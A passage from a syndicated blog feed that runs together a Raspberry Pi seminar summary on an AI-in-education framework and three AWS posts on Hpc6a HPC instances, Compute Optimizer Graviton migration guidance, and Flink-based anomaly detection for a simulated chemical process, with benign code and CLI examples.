  2. Tailor and Hone – the particular challenges you want to focus on
  3. Identify – identify (wisely), collate and …
  4. Collect – new data relevant to your focus
  5. Apply – AI techniques to the relevant data you have brought together
  6. Learn – understand what the data is telling you about your focus and return to step 5 until you are AI ready
  7. Iterate

She then went on to demonstrate how the framework is applied using the example of online teaching. Online teaching has been a key part of education throughout the coronavirus pandemic; AI systems could be used to analyse datasets generated during online teaching sessions, in order to make decisions for and recommendations to educators.

The first step of the ETHICAI framework is educate, enthuse, excite. In Rose’s example, this step consisted of choosing online teaching as a scenario, because it is very pertinent to a teacher’s practice. The second step is to tailor and hone in on particular challenges that are to be the focus, capitalising on what AI systems can do. In Rose’s example, the challenge is assessing the quality of online lessons in a way that would be useful to educators. The third step of the framework is to identify what data is required to perform this quality assessment.

Examples of data to be fed into an AI system for education, see text.

The fourth step is the collection of new data relevant to the focus of the project. The aim is to gain an increased understanding of what happens in online learning across thousands of schools. Walking through the online learning example, Rose suggested we might be able to collect the following types of data:

  • Log data
  • Audio data
  • Performance data
  • Video data, which includes eye-movement data
  • Historical data from tests and interviews
  • Behavioural data from surveying teachers and parents about how they felt about online learning

It is important to consider the ethical implications of gathering all this data about students, something that was a recurrent theme in both Rose’s presentation and the Q&A at the end.

Step five of the ETHICAI framework focuses on applying AI techniques to the relevant data to combine and process it. The figure below shows that in preparation, the various data sets need to be collated, cleaned, organised, and transformed.

Presentation slide showing that data for an AI system needs to be collated, cleaned, organised, and transformed.

From the correctly prepared data, interaction profiles can be produced in order to put characteristics from different lessons into groups/profiles. Rose described how cluster analysis using a combination of both AI and human intelligence could be used to sort lessons into groups based on common features.
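As a toy illustration of that kind of cluster analysis (not the EDUCATE team’s actual pipeline), lessons could be grouped by a handful of numeric features with scikit-learn, after which a human reviews and labels each resulting profile:

```python
# Toy sketch: grouping online lessons into interaction profiles with k-means.
# The feature names and data are invented for illustration; a real project would
# use the collated log/audio/video/performance data described above.
import numpy as np
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler

# one row per lesson: [teacher talk %, avg. student response time (s), questions asked]
lessons = np.array([
    [80, 12.0, 3],
    [45, 4.5, 18],
    [70, 9.0, 6],
    [40, 3.8, 22],
    [85, 14.0, 2],
    [50, 5.2, 15],
])

features = StandardScaler().fit_transform(lessons)
labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(features)

for cluster in sorted(set(labels)):
    print(f"Profile {cluster}: lessons {np.where(labels == cluster)[0].tolist()}")
# A human then inspects each profile (e.g. "lecture-heavy" vs "interactive")
# and decides what feedback or intervention, if any, is appropriate.
```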

The sixth step in Rose’s example focused on what may be learned from analysing collected data linked to the particular challenge of online teaching and learning. Rose said that applying an AI system to students’ behavioural data could, for example, give indications about students’ focus and confidence, and make or recommend interventions to educators accordingly.

Presentation slide showing example graphs of results produced by an AI system in education.

Where might we take applications of AI systems in education in the future?

Rose explained that AI systems can possess some types of intelligence that humans have or can develop: interdisciplinary academic intelligence, meta-knowing intelligence, and potentially social intelligence. However, there are types, such as meta-contextual intelligence and perceived self-efficacy, that AI systems are not able to demonstrate in the way humans can.

The seven types of human intelligence as defined by Rose Luckin: interdisciplinary academic knowledge, meta-knowing intelligence, social intelligence, metacognitive intelligence, meta-subjective intelligence, meta-contextual knowledge, perceived self-efficacy.

The use of AI systems in education can raise ethical issues. As an example, Rose pointed to the use of virtual glasses to identify when students need help, even if they do not realise it themselves. A system like this could help educators assess who in their class needs more help, and could link this back to student performance. However, using such a system has obvious ethical implications, and some of these were the focus of the Q&A that followed Rose’s presentation.

It’s clear that, in the education domain as in all other domains, both positive and negative outcomes of integrating AI are possible. In a recent paper written by Wayne Holmes (also from the UCL Knowledge Lab) and co-authors, ‘Ethics of AI in Education: Towards a Community Wide Framework’ [1], the authors suggest that the interpretation of data, consent and privacy, data management, surveillance, and power relations are all ethical issues that should be taken into consideration. Finding consensus for a practical ethical framework or set of principles, with all stakeholders, at the very start of an AI-related project is the only way to ensure ethics are built into the project and the AI system itself from the ground up.


Ethical issues of AI systems more broadly, and how to involve young people in discussions of AI ethics, were the focus of our seminar with Dr Mhairi Aitken back in September. You can revisit the seminar recording, presentation slides, and summary blog post.

I really enjoyed both the focus and content of Rose’s talk: educators understanding how AI systems may be applied to education in order to help them make more informed decisions about how to best support their students. This is an important factor to consider in the context of the bigger picture of what young people should be learning about AI. The work that Rose and her colleagues are doing also makes an important contribution to translating research into practical models that teachers can use.

Join our next free seminars

You may still have time to sign up for our Tuesday 11 January seminar, today at 17:00–18:30 GMT, where we will welcome Dave Touretzky and Fred Martin, founders of the influential AI4K12 framework, which identifies the five big ideas of AI and how they can be integrated into education.

Next month, on 1 February at 17:00–18:30 GMT, Tara Chklovski (CEO of Technovation) will give a presentation called Teaching youth to use AI to tackle the Sustainable Development Goals at our seminar series.

If you want to join any of our seminars, click the button below to sign up and we will send you information on how to join. We look forward to seeing you there!

You’ll always find our schedule of upcoming seminars on this page. For previous seminars, you can visit our past seminars and recordings page.

The post How can AI-based analysis help educators support students? appeared first on Raspberry Pi.

New – Amazon EC2 Hpc6a Instance Optimized for High Performance Computing

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/new-amazon-ec2-hpc6a-instance-optimized-for-high-performance-computing/

High Performance Computing (HPC) allows scientists and engineers to solve complex, compute-intensive problems such as computational fluid dynamics (CFD), weather forecasting, and genomics. HPC applications typically require instances with high memory bandwidth, a low-latency, high-bandwidth network interconnect, and access to a fast parallel file system.

Many customers have turned to AWS to run their HPC workloads. For example, Descartes Labs used AWS to power a TOP500 LINPACK benchmark run (the TOP500 list ranks the most powerful commercially available computer systems) that delivered 1.93 PFLOPS, landing at position 136 on the TOP500 list in June 2019. That run made use of 41,472 cores on a cluster of Amazon EC2 C5 instances. Last year, Descartes Labs ran the LINPACK benchmark again and placed within the top 40 on the June 2021 TOP500 list with 172,692 cores on a cluster of EC2 instances, which represents a 417 percent performance increase in just two years.

AWS enables you to increase the speed of research and reduce time-to-results by running HPC in the cloud and scaling to tens of thousands of parallel tasks that wouldn’t be practical in most on-premises environments. AWS helps you reduce costs by providing CPU, GPU, and FPGA instances on demand, Elastic Fabric Adapter (EFA), an EC2 network device that improves throughput and scaling for tightly coupled workloads, and AWS ParallelCluster, an open-source cluster management tool that makes it easy for you to deploy and manage HPC clusters on AWS.

Announcing EC2 Hpc6a Instances for HPC Workloads
Customers today across various industries use compute-optimized EFA-enabled Amazon EC2 instances (for example, C5n, R5n, M5n, and M5zn) to maximize the performance of a variety of HPC workloads, but as these workloads scale to tens of thousands of cores, cost-efficiency becomes increasingly important. We have found that customers are not only looking to optimize performance for their HPC workloads but want to optimize costs as well.

As we pre-announced in November 2021, Hpc6a, a new HPC-optimized EC2 instance, is generally available beginning today. This instance delivers 100 Gbps networking through EFA, along with 96 third-generation AMD EPYC™ (Milan) processor cores and 384 GB of RAM, and offers up to 65 percent better price performance over comparable x86-based compute-optimized instances.

You can launch Hpc6a instances today in the US East (Ohio) and GovCloud (US-West) Regions in On-Demand and Dedicated Hosting or as part of a Savings Plan. Here are the detailed specs:

| Instance Name | CPUs* | RAM | EFA Network Bandwidth | Attached Storage |
|---|---|---|---|---|
| hpc6a.48xlarge | 96 | 384 GiB | Up to 100 Gbps | EBS Only |

*Hpc6a instances have simultaneous multi-threading disabled to optimize for HPC codes. This means that unlike other EC2 instances, Hpc6a vCPUs are physical cores, not threads.

To enable predictable thread performance and efficient scheduling for HPC workloads, simultaneous multi-threading is disabled. Thanks to the AWS Nitro System, no cores are held back for the hypervisor, making all cores available to your code.

Hpc6a instances introduce a number of targeted features to deliver cost and performance optimizations for customers running tightly coupled HPC workloads that rely on high levels of inter-instance communications. These instances enable EFA networking bandwidth of 100 Gbps and are designed to efficiently scale large tightly coupled clusters within a single Availability Zone.
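As a rough sketch (not an official recipe), launching a couple of EFA-enabled Hpc6a instances with boto3 could look like the following; the AMI, subnet, security group, and placement group identifiers are placeholders, and most HPC users would let AWS ParallelCluster handle this instead:

```python
# Rough boto3 sketch of launching EFA-enabled hpc6a.48xlarge instances in one
# Availability Zone. The AMI, subnet, security group, and placement group IDs
# are placeholders; a real HPC cluster is usually built with AWS ParallelCluster.
import boto3

ec2 = boto3.client("ec2", region_name="us-east-2")  # Hpc6a launched in US East (Ohio)

response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",           # placeholder HPC-ready AMI
    InstanceType="hpc6a.48xlarge",
    MinCount=2,
    MaxCount=2,
    Placement={"GroupName": "my-cluster-pg"},  # cluster placement group (placeholder)
    NetworkInterfaces=[{
        "DeviceIndex": 0,
        "InterfaceType": "efa",                # request an Elastic Fabric Adapter
        "SubnetId": "subnet-0123456789abcdef0",
        "Groups": ["sg-0123456789abcdef0"],
    }],
)
print([i["InstanceId"] for i in response["Instances"]])
```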

We hear from many of our engineering customers, such as those in the automotive sector, that they want to reduce the need for physical testing and move toward an increasingly virtual, simulation-based product design process, delivered faster and at a lower cost.

According to our benchmarking results for a Siemens Simcenter STAR-CCM+ automotive CFD simulation, when Hpc6a scales up to 400 nodes (approximately 40,000 cores), it is able to maintain approximately 100 percent scaling efficiency with the help of EFA networking. Hpc6a also shows a 70 percent lower cost compared to C5n, meaning companies can deliver new designs faster and at a lower cost when using Hpc6a instances.

You can use the Hpc6a instance with AMD EPYC third-generation (Milan) processors to run your largest and most complex HPC simulations on EC2 and optimize for cost and performance. Customers can also use the new Hpc6a instances with AWS Batch and AWS ParallelCluster to simplify workload submission and cluster creation.

To learn more, visit our Hpc6a instance page and get in touch with our HPC team, AWS re:Post for EC2, or through your usual AWS Support contacts.

Channy

AWS Compute Optimizer supports AWS Graviton migration guidance

Post Syndicated from Pranaya Anshu original https://aws.amazon.com/blogs/compute/aws-compute-optimizer-supports-aws-graviton-migration-guidance/

This post is written by Letian Feng, Principal Product Manager for AWS Compute Optimizer, and Steve Cole, Senior EC2 Spot Specialist Solutions Architect.

Today, AWS Compute Optimizer is launching a new capability that makes it easier for you to optimize your EC2 instances by leveraging multiple CPU architectures, including x86-based and AWS Graviton-based instances. Compute Optimizer is an opt-in service that recommends optimal AWS resources for your workloads to reduce costs and improve performance by analyzing historical utilization metrics. AWS Graviton processors are custom-built by Amazon Web Services using 64-bit Arm cores to deliver the best price performance for your cloud workloads running in Amazon EC2, with the potential to realize up to 40% better price performance over comparable current generation x86-based instances. As a result, customers interested in Graviton have been asking for a scalable way to understand which EC2 instances they should prioritize in their Graviton migration journey. Starting today, you can use Compute Optimizer to find the workloads that will deliver the biggest return for the smallest migration effort.

How it works

Compute Optimizer helps you find the workloads with the biggest return for the smallest migration effort by providing a migration effort rating. The migration effort rating, ranging from very low to high, reflects the level of effort that might be required to migrate from the current instance type to the recommended instance type, based on the differences in instance architecture and whether the workloads are compatible with the recommended instance type.

Clues about the type of workload running are useful for estimating the migration effort to Graviton. For some workloads, transitioning to Graviton is as simple as updating the instance types and associated Amazon Machine Images (AMIs) directly or in various launch or CloudFormation templates. For other workloads, you might need to use different software versions or change source codes. The quickest and easiest workloads to transition are Linux-based open-source applications. Many open source projects already support Arm64, and by extension Graviton. Therefore, many customers start their Graviton migration journey by checking whether their workloads are among the list of Graviton-compatible applications. They then combine this information with estimated savings from Compute Optimizer to build a list of Graviton migration opportunities.

Because Compute Optimizer cannot see inside an instance, it looks to instance attributes for clues about the workload type running on the EC2 instance. The clues Compute Optimizer uses are based on the instance attributes customers provide, such as instance tags, AWS Marketplace product names, AMI names, and CloudFormation template names. For example, when an instance is tagged with “key:application-type” and “value:hadoop”, Compute Optimizer will identify the application (Apache Hadoop in this example). Then, because we know that major frameworks, such as Apache Hadoop, Apache Spark, and many others, run on Graviton, Compute Optimizer will indicate that there is a low migration effort to Graviton and point customers to documentation that outlines the required steps for migrating a Hadoop application to Graviton.

As another example, when Compute Optimizer sees an instance is using a Microsoft Windows SQL Server AMI, Compute Optimizer will infer that SQL Server is running. Then, because it takes a lot of effort to modernize and migrate a SQL Server workload to Arm, Compute Optimizer will indicate that there is a high migration effort to Graviton. The most effective way to give Compute Optimizer clues about what application is running is by putting an “application-type” tag onto each instance. If Compute Optimizer doesn’t have enough clues, it will indicate that it doesn’t have enough information to offer migration guidance.

The following shows the different levels of migration effort:

  • Very Low – The recommended instance type has the same CPU architecture as the current instance type. Often, customers can just modify instance types directly, or do a simple re-deployment onto the new instance type. So, this is just an optimization, not a migration.
  • Low – The recommended instance type has different CPU architecture from the current instance type, but there’s a low-effort migration path. For example, migrating Apache Hadoop or Redis from x86 to Graviton falls under this category as both Hadoop and Redis have Graviton-compatible versions.
  • Medium – The recommended instance type has different CPU architecture from the current instance type, but Compute Optimizer doesn’t have enough information to offer migration guidance.
  • High – The recommended instance type has different CPU architecture from the current instance type, and the workload has no known compatible version on the recommended CPU architecture. Therefore, customers may need to re-compile their applications or re-platform their workloads (like moving from SQL Server to MySQL).

More and more applications support Graviton every day. If you’re running an application that you know has low migration effort, but Compute Optimizer isn’t yet aware, please tell us! Shoot us an email at [email protected] with the application type, and we’ll update our migration guidance mappings as quickly as we can. You can also put an “application-type” tag on your instances so that Compute Optimizer can infer your application type with high confidence.

Customers who have already opted into Compute Optimizer recommendations will have immediate access to this new capability. Customers who haven't can opt in with a single console click or API call, enabling all Compute Optimizer features.

Walk through

Now, let’s take a look at how to get started with Graviton recommendation on Compute Optimizer. When you open the Compute Optimizer console, you will see the dashboard page that provides you with a summary of all optimization opportunities in your account. Graviton recommendation is available for EC2 instances and Auto Scaling groups.

Screenshot of Compute Optimizer dashboard page, which shows the number of EC2 instance and Auto Scaling group recommendations by findings in your AWS account.

After you click on View recommendations for EC2 instances, you will come to the EC2 recommendation list view. Here is where you can see a list of your EC2 instances, their current instance type, our finding (over-provisioned, under-provisioned, or optimized), the recommended optimal instance type, and the estimated savings if there is a downsizing opportunity. By default, we will show you the best-fit instance type for the price regardless of CPU architecture. In many cases this means that Graviton will be recommended because EC2 offers a wide selection of Graviton instances with a comparatively high price/performance ratio. If you'd like to look only at recommendations for your current architecture, you can use the CPU architecture preference dropdown to tell Compute Optimizer to show recommendations with only the current CPU architecture.

Compute Optimizer EC2 Recommendation List Page. Here you can select both current and Graviton as the preferred CPU architectures. The recommendation list contains two new columns: migration effort and inferred workload types.

Here you can see two new columns: Migration effort and Inferred workload types. The Inferred workload types field shows the type of workload Compute Optimizer has inferred your instance is running. The Migration effort field shows how much effort you might need to spend if you migrate from your current instance type to the recommended instance type, based on the inferred workload type. When there is no change in CPU architecture (that is, moving from one x86 instance type to another, as in the third row), the migration effort will be Very low. For x86 instances that are running Graviton-compatible applications, such as Apache Hadoop, NGINX, or Memcached, the effort to migrate the instance to Graviton will be Low. If Compute Optimizer cannot identify the applications, the migration effort from x86 to Graviton will be Medium, and you can provide application type data by putting an application-type tag key onto the instance. You can click on each row to see a more detailed recommendation. Let's click on the first row.

Compute Optimizer EC2 Recommendation Detail Page. The current instance type is r5.large. Recommended option 1 is r6g.large, with low migration effort. Recommended option 2 is t4g.xlarge, with low migration effort. Recommended option 3 is m6g.xlarge, with low migration effort.

Compute Optimizer identifies this instance to be running Apache Hadoop workloads because there's an Amazon EMR system tag associated with it. It shows a banner that details why Compute Optimizer considers this a low-effort Graviton migration candidate, and offers a migration guide when you click on Learn more.

Github screenshot of AWS Graviton migration guide. The migration guide details steps to transition workloads from x86-based instances to Graviton-based instances.

The same Graviton recommendation can also be retrieved through the Compute Optimizer API or CLI. Here's a sample CLI command that retrieves the same recommendation discussed above:

aws compute-optimizer get-ec2-instance-recommendations --instance-arns arn:aws:ec2:us-west-2:020796573343:instance/i-0b5ec1bb9daabf0f3 --recommendation-preferences "{\"cpuVendorArchitectures\": [\"CURRENT\" , \"AWS_ARM64\"]}"
{
    "instanceRecommendations": [
        {
            "instanceArn": "arn:aws:ec2:us-west-2:000000000000:instance/i-0b5ec1bb9daabf0f3",
            "accountId": "000000000000",
            "instanceName": "Compute Intensive",
            "currentInstanceType": "r5.large",
            "finding": "UNDER_PROVISIONED",
            "findingReasonCodes": [
                "CPUUnderprovisioned",
                "EBSIOPSOverprovisioned"
            ],
            "inferredWorkloadTypes": [
                "ApacheHadoop"
            ],
            "utilizationMetrics": [
                {
                    "name": "CPU",
                    "statistic": "MAXIMUM",
                    "value": 100.0
                },
                {
                    "name": "EBS_READ_OPS_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 0.0
                },
                {
                    "name": "EBS_WRITE_OPS_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 4.943333333333333
                },
                {
                    "name": "EBS_READ_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 0.0
                },
                {
                    "name": "EBS_WRITE_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 880541.9921875
                },
                {
                    "name": "NETWORK_IN_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 18113.96638888889
                },
                {
                    "name": "NETWORK_OUT_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 90.37638888888888
                },
                {
                    "name": "NETWORK_PACKETS_IN_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 2.484055555555556
                },
                {
                    "name": "NETWORK_PACKETS_OUT_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 0.3302777777777778
                }
            ],
            "lookBackPeriodInDays": 14.0,
            "recommendationOptions": [
                {
                    "instanceType": "r6g.large",
                    "projectedUtilizationMetrics": [
                        {
                            "name": "CPU",
                            "statistic": "MAXIMUM",
                            "value": 70.76923076923076
                        }
                    ],
                    "platformDifferences": [
                        "Architecture"
                    ],
                    "migrationEffort": "Low",
                    "performanceRisk": 1.0,
                    "rank": 1
                },
                {
                    "instanceType": "t4g.xlarge",
                    "projectedUtilizationMetrics": [
                        {
                            "name": "CPU",
                            "statistic": "MAXIMUM",
                            "value": 33.33333333333333
                        }
                    ],
                    "platformDifferences": [
                        "Hypervisor",
                        "Architecture"
                    ],
                    "migrationEffort": "Low",
                    "performanceRisk": 3.0,
                    "rank": 2
                },
                {
                    "instanceType": "m6g.xlarge",
                    "projectedUtilizationMetrics": [
                        {
                            "name": "CPU",
                            "statistic": "MAXIMUM",
                            "value": 33.33333333333333
                        }
                    ],
                    "platformDifferences": [
                        "Architecture"
                    ],
                    "migrationEffort": "Low",
                    "performanceRisk": 1.0,
                    "rank": 3
                }
            ],
            "recommendationSources": [
                {
                    "recommendationSourceArn": "arn:aws:ec2:us-west-2:000000000000:instance/i-0b5ec1bb9daabf0f3",
                    "recommendationSourceType": "Ec2Instance"
                }
            ],
            "lastRefreshTimestamp": "2021-12-28T11:00:03.576000-08:00",
            "currentPerformanceRisk": "High",
            "effectiveRecommendationPreferences": {
                "cpuVendorArchitectures": [
                    "CURRENT", 
                    "AWS_ARM64"
                ],
                "enhancedInfrastructureMetrics": "Inactive"
            }
        }
    ],
    "errors": []
}
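
The same recommendation can also be retrieved with the AWS SDK for Python (boto3). The following is a minimal sketch that mirrors the CLI call above, assuming the lowerCamelCase parameter and response field names shown in the output; the instance ARN is a placeholder.

import boto3

# Sketch of the equivalent SDK call; the instance ARN is a placeholder.
co = boto3.client("compute-optimizer", region_name="us-west-2")

response = co.get_ec2_instance_recommendations(
    instanceArns=["arn:aws:ec2:us-west-2:000000000000:instance/i-0b5ec1bb9daabf0f3"],
    recommendationPreferences={"cpuVendorArchitectures": ["CURRENT", "AWS_ARM64"]},
)

for rec in response["instanceRecommendations"]:
    for option in rec["recommendationOptions"]:
        print(option["instanceType"], option.get("migrationEffort"), option["rank"])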

Conclusion

Compute Optimizer Graviton recommendations are available in US East (Ohio), US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), Europe (Stockholm), and South America (São Paulo) Regions at no additional charge. To get started with Compute Optimizer, visit the Compute Optimizer webpage.

Detect Real-Time Anomalies and Failures in Industrial Processes Using Apache Flink

Post Syndicated from Hubert Asamer original https://aws.amazon.com/blogs/architecture/detect-real-time-anomalies-and-failures-in-industrial-processes-using-apache-flink/

For a long time, industrial control systems have been the heart of the manufacturing process, allowing data from the shop floor to be collected, processed, and acted on. Process manufacturers use a distributed control system (DCS) for the automated control and operation of an industrial process or plant.

With the convergence of operational technology and information technology (IT), customers such as Yara are integrating their DCS with additional intelligence from the IT side. This provides customers with a holistic view of the different data sources to make more complex decisions with advanced analytics.

In this blog post, we show how to start with advanced analytics on streaming data coming from the shop floor. The sensor data, such as pressure and temperature, is typically published by a DCS. It is then ingested by a local edge gateway and streamed to the cloud with streaming and industrial internet of things (IoT) technology. Analytics on the streaming data is typically done before all data points are stored in the data layer. Figure 1 shows how the data flow can be modeled and visualized with AWS services.

Figure 1: High-level ingestion and analytics architecture

In this example, we concentrate on the streaming analytics part in the cloud. We generate data from a simulated DCS and send it to Amazon Kinesis Data Streams; in a real deployment, a gateway such as AWS IoT Greengrass and possibly other IoT services would sit in between.

For the simulated process that the DCS is controlling, we use a well-documented industrial process for creating a chemical compound (acetic anhydride) called the Tennessee Eastman process (TEP). There are several simulations available as open source. We demonstrate how to use this data as a constant stream with more than 30 real-time measurement parameters, ingest it to Kinesis Data Streams, and run in-stream analytics using Apache Flink. Within Apache Flink, data is grouped and mapped to the respective stages and parts of the industrial process, and constantly analyzed by calculating anomalies of all process stages. All raw data, plus the derived anomalies and failure patterns, are then ingested from Apache Flink to Amazon Timestream for further use in near real-time dashboards.

Overview of solution

Note: Refer to steps 1 to 6 in Figure 2.

As a starting point for a realistic and data-intensive measurement source, we use an existing TEP simulation framework written in C++, originally created by the National Institute of Standards and Technology and published as open source. The GitHub repository accompanying this blog contains a small patch which adds AWS connectivity with the software development kits (SDKs) and modifications to the command line arguments. The programs provided by this framework are (step 1) a simulation process starter with configurable starting conditions and timestep configurations, and (step 2) a real-time client which connects to the simulation and sends the simulation output data to the AWS Cloud.

Tennessee Eastman process (TEP) background

A paper by Downs & Vogel, A plant-wide industrial process control problem, from 1991 states:

“This chemical standard process consists of a reactor/separator/recycle arrangement involving two simultaneous gas-liquid exothermic reactions.”

“The process produces two liquid products from four reactants. Also present are an inert and a byproduct making a total of eight components. Two additional byproduct reactions also occur. The process has 12 valves available for manipulation and 41 measurements available for monitoring or control.”

The simulation framework used can control all of the 12 valve settings and produces 41 measurement variables with varying sampling frequency.

Data ingestion

The 41 measurement variables, named xmeas_1 to xmeas_41, are emitted by the real-time client (step 2) as key-value JSON messages. The client code is configured to produce 100 messages per second. A built-in C++ Kinesis SDK allows the real-time client to directly stream JSON messages to a Kinesis data stream (step 3).
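
The real-time client in this walkthrough is written in C++, but the shape of the ingestion call is straightforward to illustrate. The following is a minimal sketch of sending one such JSON message with the AWS SDK for Python (boto3); the stream name and the truncated set of measurements are placeholders, not the actual client code.

import json
import boto3

# Illustrative only: the walkthrough's real-time client is written in C++.
# The stream name and measurement values below are placeholders.
kinesis = boto3.client("kinesis")

message = {"xmeas_1": 3649.74, "xmeas_2": 4451.32, "xmeas_3": 9.22}  # subset of the 41 xmeas variables

kinesis.put_record(
    StreamName="tep-ingest-stream",            # hypothetical stream name
    Data=json.dumps(message).encode("utf-8"),
    PartitionKey="tep-simulation",
)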

Figure 2 – Detailed system architecture

Stream processing with Apache Flink

Messages sent to the Amazon Kinesis data stream are processed in configurable batch sizes by an Apache Flink application, deployed in Amazon Kinesis Data Analytics. Apache Flink is an open-source stream processing framework, written and usable in Java or Scala. As described in Figure 3, it allows the definition of various data sources (for example, a Kinesis data stream) and data sinks for storing processing results. In between, data can be processed by a range of operators, typically mapping and reducing functions (step 4).

In our case, we use a mapping operator where each batch of incoming messages is processed. In Code snippet 1, we apply a custom mapping function to the raw data stream. For rapid and iterative development purposes it's possible to have the complete stream processing pipeline running in a local Java or Scala IDE such as Eclipse or IntelliJ IDEA, using a build tool such as Maven.

Figure 3: Flink execution plan (green: streaming data sources; yellow: data sinks)

public class StreamingJob extends AnomalyDetector {
---
  public static DataStream<String> createKinesisSource
    (StreamExecutionEnvironment env, 
     ParameterTool parameter)
    {
    // create Stream
    return kinesisStream;
  }
---
  public static void main(String[] args) {
    // set up the execution environment
    final StreamExecutionEnvironment env = 
      StreamExecutionEnvironment.getExecutionEnvironment();
---
    DataStream<List<TimestreamPoint>> mainStream =
      createKinesisSource(env, parameter)
      .map(new AnomalyJsonToTimestreamPayloadFn(parameter))
      .name("MaptoTimestreamPayload");
---
    env.execute("Amazon Timestream Flink Anomaly Detection Sink");
  }
}

Code snippet 1: Flink application main class

In-stream anomaly detection

Within the Flink mapping operator, a statistical outlier detection (anomaly detection) is implemented. Flink allows the inclusion of custom libraries within its operators. The library used here is published by AWS: a Random Cut Forest implementation available on GitHub. Random Cut Forest is a well-understood statistical method which can operate on batches of measurements. It calculates an anomaly score for each new measurement by comparing the new value with a cached pool (the forest) of older values.
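
The application uses AWS's Random Cut Forest library, shown in the Java snippets that follow. Purely to illustrate the general idea of scoring a new value against a cached window of recent history, here is a simplified Python sketch (a z-score over a sliding window, not the Random Cut Forest algorithm itself):

from collections import deque

class SimpleAnomalyScorer:
    """Toy illustration of scoring a new value against a cached window of history.
    The blog's application uses AWS's Random Cut Forest library, not this logic."""

    def __init__(self, window_size: int = 256):
        self.window = deque(maxlen=window_size)  # the cached pool of older values

    def score(self, value: float) -> float:
        if len(self.window) < 2:
            self.window.append(value)
            return 0.0
        mean = sum(self.window) / len(self.window)
        variance = sum((v - mean) ** 2 for v in self.window) / len(self.window)
        std = variance ** 0.5 or 1.0  # avoid division by zero on constant history
        self.window.append(value)
        return abs(value - mean) / std  # larger score means more anomalous

scorer = SimpleAnomalyScorer()
for reading in (47.5, 47.6, 47.4, 47.5, 95.0):
    print(round(scorer.score(reading), 2))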

The algorithm allows the creation of grouped anomaly scores, where a set of variables is combined to calculate a single anomaly score. In the simulated chemical process (TEP), we can group the measurement variables into three process stages:

  1. Reactor feed analysis
  2. Purge gas analysis
  3. Product analysis

Each group consists of 5–10 measurement variables, and we get one anomaly score per group. In Code snippet 2 we can see how an anomaly detector is created. The class AnomalyDetector is instantiated and then extended three times (once for each of our three distinct process stages) within the mapping function, as described in Code snippet 3.

Flink distributes this calculation across its worker nodes and handles data deduplication processes within its system.

---
public class AnomalyDetector {
    protected final ParameterTool parameter;
    protected final Function<RandomCutForest, LineTransformer> algorithmInitializer;
    protected LineTransformer algorithm;
    protected ShingleBuilder shingleBuilder;
    protected double[] pointBuffer;
    protected double[] shingleBuffer;
    public AnomalyDetector(
      ParameterTool parameter,
      Function<RandomCutForest,LineTransformer> algorithmInitializer)
    {
      this.parameter = parameter;
      this.algorithmInitializer = algorithmInitializer;
    }
    public List<String> run(Double[] values) {
            if (pointBuffer == null) {
                prepareAlgorithm(values.length);
            }
      return processLine(values);
    }
    protected void prepareAlgorithm(int dimensions) {
---
      RandomCutForest forest = RandomCutForest.builder()
        .numberOfTrees(Integer.parseInt(
          parameter.get("RcfNumberOfTrees", "50")))
        .sampleSize(Integer.parseInt(
          parameter.get("RcfSampleSize", "8192")))
        .dimensions(shingleBuilder.getShingledPointSize())
        .lambda(Double.parseDouble(
          parameter.get("RcfLambda", "0.00001220703125")))
        .randomSeed(Integer.parseInt(
          parameter.get("RcfRandomSeed", "42")))
      .build();
---
    algorithm = algorithmInitializer.apply(forest);
  }

Code snippet 2: AnomalyDetector base class, which gets extended by the streaming applications main class

public class AnomalyJsonToTimestreamPayloadFn extends 
    RichMapFunction<String, List<TimestreamPoint>> {
  protected final ParameterTool parameter;
  private final Logger logger =
    LoggerFactory.getLogger(AnomalyJsonToTimestreamPayloadFn.class);

  public AnomalyJsonToTimestreamPayloadFn(ParameterTool parameter) {
    this.parameter = parameter;
  }

  // create new instance of StreamingJob for running our Forest
  StreamingJob overallAnomalyRunner1;
  StreamingJob overallAnomalyRunner2;
  StreamingJob overallAnomalyRunner3;
---

  // use the `open` method for RCF initialization
  @Override
  public void open(Configuration parameters) throws Exception {
    overallAnomalyRunner1 = new StreamingJob(parameter);
    overallAnomalyRunner2 = new StreamingJob(parameter);
    overallAnomalyRunner3 = new StreamingJob(parameter);
    super.open(parameters);
  }
---

Code snippet 3: Mapping Function uses the Flink RichMapFunction open routine to initialize three distinct Random Cut Forests

Data persistence – Flink data sinks

After all anomalies are calculated, we can decide where to send this data. Flink provides various ready-to-use data sinks. In these examples, we fan out all (raw and processed) data to Amazon Kinesis Data Firehose for long-term storage in Amazon Simple Storage Service (Amazon S3) (step 5) and to Amazon Timestream for short-term storage (step 5). Kinesis Data Firehose is configured with a small AWS Lambda function to reformat data from JSON to CSV, and data is stored with automated partitioning to Amazon S3. A Timestream data sink does not come pre-bundled with Flink, so custom Timestream ingestion code is used in these examples. Flink provides extensible operator interfaces for the creation of custom map and sink functions.

Timeseries handling

Timestream, in combination with Grafana, is used for near real-time monitoring. Grafana comes bundled with a Timestream data source plugin and can constantly query and visualize Timestream data (step 6).

Walkthrough

Our architecture is available as a deployable AWS CloudFormation template. The simulation framework comes packaged as a Docker image, with an option to install it locally on a Linux host.

Prerequisites

To implement this architecture, you will need:

  • An AWS account
  • Docker (CE) Engine v18 or later
  • Java JDK v11 or later
  • Maven v3.6 or later

We recommend running a recent Linux environment, either locally or in the cloud. It is assumed that you are using AWS Cloud9, deployed with CloudFormation, within your AWS account.

Steps

Follow these steps to deploy the solution and play with the simulation framework. At the end, detected anomalies derived from Flink are stored next to all raw data in Timestream and presented in Grafana. We’re using AWS Cloud9 and its Linux terminal capabilities here to fire up a Grafana instance, then manually run the simulation to ingest data to Kinesis and optionally manually start the Flink app from the console using Maven.

Deploy stack

